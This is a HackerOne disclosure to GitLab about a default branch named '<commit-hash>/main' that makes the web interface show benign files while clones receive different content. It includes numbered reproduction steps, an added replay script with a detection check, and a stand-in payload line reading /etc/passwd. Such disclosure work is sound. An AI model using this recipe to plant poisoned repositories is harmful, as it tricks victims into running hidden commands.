
The main branch of a repository with a specially designed name allows an attacker to create repositories with malicious code.

HackerOne report #1864278 by st4nly0n on 2023-02-06, assigned to GitLab Team:


Report

 

Description:

The main branch of a repository with a specially crafted name allows an attacker to create repositories with malicious code; victims who clone or download these repositories will execute arbitrary code on their systems.

When the main branch of a repository has the name <commit-hash>/<directory>, for example 3038cd56e64b952a122215b4bef05814d7a25182/main, the Gitlab web interface will not display the files belonging to HEAD; instead it will display the contents of the files within the main directory that belong to commit 3038cd56e64b952a122215b4bef05814d7a25182.

In this state, the Gitlab web interface is not able to show the actual content of the files; the web interface will always show the content of the files in commit 3038cd56e64b952a122215b4bef05814d7a25182. However, when downloading the repository from the web interface or when cloning via CLI, the victim gets the content of the files from HEAD.
 

Steps To Reproduce:

  • The following steps must be performed as the attacker user

1. Create a public repository (Initialize README.md).

2. Unprotect the main branch.

3. Clone and enter the repository:

git clone <repo>
cd <repo>

4. Create a hello.sh file, with harmless code:

echo "echo 'hello world'" > hello.sh

5. Create a directory named main:

mkdir main

6. Copy the README.md and hello.sh files to the main directory:

cp README.md main/ && cp hello.sh main/

7. Delete git history:

git update-ref -d HEAD

8. Confirm changes and push to remote:

git add .
git commit -m 'Init'
git push origin HEAD -f

9. Create a shell variable with the date of the last commit:

GIT_COMMITTER_DATE=$(git show -s --format=%cd $(git rev-parse HEAD))

10. Create a branch with the following format <last-commit-hash>/main:

git checkout -b "$(git rev-parse HEAD)/main"

11. Push the branch to the remote:

git push origin HEAD -f

12. From the web interface, change the default branch to the <last-commit-hash>/main branch created earlier.

13. Remove the main branch:

git push origin -d main

14. Remove the main directory from the <last-commit-hash>/main branch:

rm -rf main/

15. Change the content of hello.sh with the payload of your choice:

# EXAMPLE:
echo 'cat /etc/passwd' > hello.sh

16. Delete git history:

git update-ref -d HEAD

17. Confirm the changes with the modified date and push to remote:

git add .
git commit -m 'Init' --date "$GIT_COMMITTER_DATE"
git push origin HEAD -f
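The following script is an added example for this issue; it is not the reporter's proof of concept and not GitLab code. It replays steps 1-17 against a local bare repository that stands in for the GitLab server (so no GitLab instance is needed), then contrasts what a path-based lookup of "<commit>/main/hello.sh" finds in the server's object store with what a fresh clone actually checks out, which is the gap described under "expected correct behavior" below. It also adds a small check for branch names of the shape "<40-hex>/<path>". The helper names (hashlike_prefix, ambiguous_in_repo, build_demo, web_view, clone_view, default_branch), the demo identity and the payload line are illustrative choices; only git and a POSIX sh are assumed.

```shell
#!/bin/sh
# Added example for this report (not the reporter's PoC, not GitLab code):
# replay the steps against a local bare repo that stands in for the server,
# then show the "<commit>/<path>" vs branch-name ambiguity and a check for it.
set -eu

export GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.invalid
export GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.invalid

# hashlike_prefix BRANCH: print the first path component of BRANCH if it is a
# full 40-hex object id (the shape the report abuses); fail otherwise.
hashlike_prefix() {
    first=${1%%/*}
    [ "$first" != "$1" ] || return 1            # no slash, nothing to confuse
    case $first in *[!0-9a-f]*) return 1 ;; esac
    [ ${#first} -eq 40 ] || return 1
    printf '%s\n' "$first"
}

# ambiguous_in_repo REPO BRANCH: succeed if BRANCH "<id>/<rest>" can also be
# read as path <rest> inside commit <id>, and that commit is still present in
# REPO's object store (reachable or not). Only meaningful on the server copy.
ambiguous_in_repo() {
    id=$(hashlike_prefix "$2") || return 1
    git -C "$1" cat-file -e "$id:${2#*/}" 2>/dev/null
}

# build_demo BASE: recreate the report's repository state under BASE.
# BASE/remote.git plays the server, BASE/attacker is the attacker's clone and
# BASE/victim is a fresh clone of the final state. Prints the trap branch name.
build_demo() {
    base=$1; a=$base/attacker
    git init -q --bare "$base/remote.git"
    git -C "$base/remote.git" symbolic-ref HEAD refs/heads/main
    git clone -q --no-local "$base/remote.git" "$a" 2>/dev/null
    git -C "$a" symbolic-ref HEAD refs/heads/main
    # steps 1-8: harmless hello.sh, a copy under main/, pushed as branch main
    printf 'README\n' > "$a/README.md"
    printf "echo 'hello world'\n" > "$a/hello.sh"
    mkdir "$a/main" && cp "$a/README.md" "$a/hello.sh" "$a/main/"
    git -C "$a" add . && git -C "$a" commit -q -m Init
    git -C "$a" push -q origin HEAD -f
    benign=$(git -C "$a" rev-parse HEAD)
    # steps 10-13: branch "<hash>/main" is pushed, made default, main deleted
    git -C "$a" checkout -q -b "$benign/main"
    git -C "$a" push -q origin HEAD -f
    git -C "$base/remote.git" symbolic-ref HEAD "refs/heads/$benign/main"
    git -C "$a" push -q origin -d main
    # steps 14-17: orphan commit on the trap branch carrying the real payload
    rm -rf "$a/main"
    printf 'cat /etc/passwd\n' > "$a/hello.sh"   # constructed stand-in payload
    git -C "$a" update-ref -d HEAD
    git -C "$a" add . && git -C "$a" commit -q -m Init
    git -C "$a" push -q origin HEAD -f
    # the victim clones over the transport (--no-local), as over the network
    git clone -q --no-local "$base/remote.git" "$base/victim"
    printf '%s\n' "$benign/main"
}

# web_view BASE BRANCH: what a path-based lookup of "<branch>/hello.sh" yields
# when the server reads "<id>/main/hello.sh" as commit <id>, path main/hello.sh.
web_view() { git -C "$1/remote.git" show "${2%%/*}:main/hello.sh"; }
# clone_view BASE: what the victim actually checked out.
clone_view() { git -C "$1/victim" show HEAD:hello.sh; }
# default_branch REPO: the branch HEAD points at.
default_branch() { git -C "$1" symbolic-ref --short HEAD; }

DEMO=$(mktemp -d)
TRAP=$(build_demo "$DEMO")
echo "default branch in victim clone: $(default_branch "$DEMO/victim")"
echo "server-side path lookup shows:  $(web_view "$DEMO" "$TRAP")"
echo "victim clone actually has:      $(clone_view "$DEMO")"
if ambiguous_in_repo "$DEMO/remote.git" "$TRAP"; then
    echo "server object store still holds the stale commit: name is ambiguous"
fi
```

Run it with sh; it leaves the demo repositories under the temporary directory for inspection. The two checks behave differently on purpose: ambiguous_in_repo succeeds on the server copy because the benign commit is unreachable but still in the object store (no gc has pruned it, which is exactly the state the web interface was reading), and fails on the victim clone because a clone over the transport only receives reachable objects. A client therefore cannot resolve the collision itself and can only flag the name shape with hashlike_prefix before trusting a default branch; the server side is where the collision has to be rejected or resolved unambiguously.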

As a result of this behavior, the proof-of-concept video shows how the victim views a repository through the Gitlab web interface; for the victim the hello.sh file does not represent a security risk. However, once they download or clone the repository and execute the hello.sh file, it executes an unexpected command.

PoC video:
poc.mp4
 

What is the current bug behavior?

The web interface does not guarantee file integrity when the main branch name has a specially crafted name. This allows an attacker to create repositories with poisoned content.
 

What is the expected correct behavior?

The files in the main branch of a repository that are displayed through the Gitlab web interface must be the same as the ones you get when downloading or cloning the repository.
 

Output of checks

This bug happens on GitLab.com
 

Impact

An attacker can get a victim to execute unexpected arbitrary commands on his system if the victim clones and executes files from a repository that initially do not pose a security risk.

For the proof of concept the victim has executed the calculator on his system; however, through what is described in this report, an attacker will want to take control of the victim's system or obtain confidential information. This attack manages to impact the availability, integrity and confidentiality of the affected user.
